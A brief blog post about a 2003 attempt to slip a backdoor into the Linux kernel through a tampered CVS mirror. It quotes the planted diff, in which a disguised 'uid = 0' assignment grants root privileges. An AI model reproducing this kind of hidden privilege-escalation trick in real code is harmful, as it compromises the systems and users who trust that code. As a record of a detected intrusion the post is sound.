It appears that someone tried to sneak a subtle backdoor into the Linux kernel source, one that would allow any application to elevate to root privileges.
The BitKeeper source is exported nightly and merged into a CVS repository, to give people access to the head of the tree without requiring BitKeeper. This CVS repository appears to have been directly changed, suggesting a breach on that BK host. When BitKeeper attempted to commit the daily code, the difference alerted the BitKeeper people to the change.
Wow:
That is some subtle hacking. I would not have noticed that.
The BitKeeper source is exported nightly and merged into a CVS repository, to give people access to the head of the tree without requiring BitKeeper. This CVS repository appears to have been directly changed, suggesting a breach on that BK host. When BitKeeper attempted to commit the daily code, the difference alerted the BitKeeper people to the change.
--- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;
Wow:
current->uid = 0That is some subtle hacking. I would not have noticed that.
posted by Eric Hancock at
9:58 AM
0 Comments:
Post a Comment
<< Home